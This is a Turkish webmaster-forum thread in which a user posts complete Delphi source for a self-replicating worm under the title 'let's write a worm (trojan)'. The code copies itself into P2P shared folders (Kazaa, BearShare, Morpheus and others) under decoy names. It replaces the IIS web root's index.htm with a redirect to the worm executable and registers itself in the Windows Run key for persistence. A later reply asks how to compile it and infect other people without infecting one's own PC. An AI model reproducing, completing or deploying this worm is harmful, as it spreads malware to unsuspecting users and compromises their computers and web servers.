Delphide worm(trojen) yazalım - Güvenlik Açıkları ve ipuçları

Webmaster Araçları

Kutsal Webmaster Bilgi Kaynağı

Yazan
ahmet Yeni Üye	03 Temmuz 2010 Cumartesi 09:59:11 kendini heryere kopyalıyor silinmesi güç. // define icon file {$R icon.res} uses SysUtils, Windows, Math, Registry; var gtr: TRegistry; ukd: TextFile; // w0rm exe name ljlzjoa: String = 'evildark.exe'; // p2p exe names, modify the array! nyi8: array [0..2] of string = ( 'iu22.exe','gy54.exe','ja13.exe'); // begin kazaa infection procedure procedure lzrcdsl; var nt54: string; p: integer; begin gtr:=TRegistry.Create; gtr.RootKey:=HKEY_CURRENT_USER; // reading kazaa shared folder if gtr.OpenKeyReadOnly('\Software\Kazaa\LocalContent') then begin nt54:=gtr.ReadString('DownloadDir'); gtr.Free; // begin copying our w0rm for p:=0 to 2 do begin CopyFile(PChar(ParamStr(0)),PChar(nt54+'\'+nyi8[p]), true); end; end; end; procedure eaiivzg; var wotbsood: string; begin gtr:=TRegistry.Create; gtr.RootKey:=HKEY_LOCAL_MACHINE; // reading wwwroot folder from reg if gtr.OpenKeyReadOnly('\SOFTWARE\Microsoft\InetStp') then begin wotbsood:=gtr.ReadString('PathWWWRoot'); gtr.Free; // creating new index.htm AssignFile(ukd,wotbsood+'\index.htm'); Rewrite(ukd); Writeln(ukd, '<meta http-equiv="refresh" content="1;URL='+nyi8[1]+'">'); CloseFile(ukd); // copying w0rm 2 wwwroot CopyFile(PChar(ParamStr(0)),PChar(wotbsood+'\'+nyi8[1]), true); end; end; procedure zdlwoihr; var bbnje9, ywqbw2: string; oa: integer; begin // getting systemdrive and default program install folder bbnje9:=GetEnvironmentVariable('SystemDrive'); ywqbw2:=GetEnvironmentVariable('ProgramFiles'); for oa:=0 to 78 do begin // copy w0rm 2 default p2p folders CopyFile(PChar(ParamStr(0)),PChar(bbnje9+'\My Downloads\'+nyi8[RandomRange(0,3)]), true); CopyFile(PChar(ParamStr(0)),PChar(bbnje9+'\Downloads\'+nyi8[RandomRange(0,3)]), true); CopyFile(PChar(ParamStr(0)),PChar(bbnje9+'\My Shared Folder\'+nyi8[RandomRange(0,3)]), true); CopyFile(PChar(ParamStr(0)),PChar(ywqbw2+'\Warez P2P Client\My Shared Folder\'+nyi8[RandomRange(0,3)]), true); CopyFile(PChar(ParamStr(0)),PChar(ywqbw2+'\gnucleus\Downloads\'+nyi8[RandomRange(0,3)]), true); CopyFile(PChar(ParamStr(0)),PChar(ywqbw2+'\Morpheus\Downloads\'+nyi8[RandomRange(0,3)]), true); CopyFile(PChar(ParamStr(0)),PChar(ywqbw2+'\KMD\My Shared Folder\'+nyi8[RandomRange(0,3)]), true); CopyFile(PChar(ParamStr(0)),PChar(ywqbw2+'\BearShare\Shared\'+nyi8[RandomRange(0,3)]), true); CopyFile(PChar(ParamStr(0)),PChar(ywqbw2+'\KaZaa Lite\My Shared Folder\'+nyi8[RandomRange(0,3)]), true); CopyFile(PChar(ParamStr(0)),PChar(ywqbw2+'\KaZaa\My Shared Folder\'+nyi8[RandomRange(0,3)]), true); CopyFile(PChar(ParamStr(0)),PChar(ywqbw2+'\Grokster\My Shared Folder\'+nyi8[RandomRange(0,3)]), true); end; end; // getting system32 dir func function lxgao: string; var rfg7: array [0..MAX_PATH+1] of Char; begin GetSystemDirectory(rfg7, MAX_PATH); Result:=string(rfg7); end; // copy w0rm to system32 folder, add w0rm to registry procedure procedure hnqshn; begin CopyFile(PChar(ParamStr(0)),Pchar(lxgao+'\'+ljlzjoa), false); gtr:=TRegistry.Create; gtr.RootKey:=HKEY_LOCAL_MACHINE; gtr.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run', false); gtr.WriteString(ljlzjoa,lxgao+'\'+ljlzjoa); gtr.CloseKey; gtr.Free; end; // begin w0rm main c0de, call our func's/proc's and run the shit :p begin // add w0rm2reg hnqshn; // copy2kazaa sharing folder lzrcdsl; // add w0rm2iis wwwroot eaiivzg; // copy2known p2p folders zdlwoihr; end.
logi Yeni Üye	14 Nisan 2013 Pazar 08:28:38 hacı bbu kodu exe mi yapıcaz nasıl kendi pc mize bulaştırmadan millete bulaştırıcaz biraz bilgi verirmisin
Cevap yazmak için üye olmalısınız! Hemen üye olmak için burayı tıklayınız..

Sayfalar: 1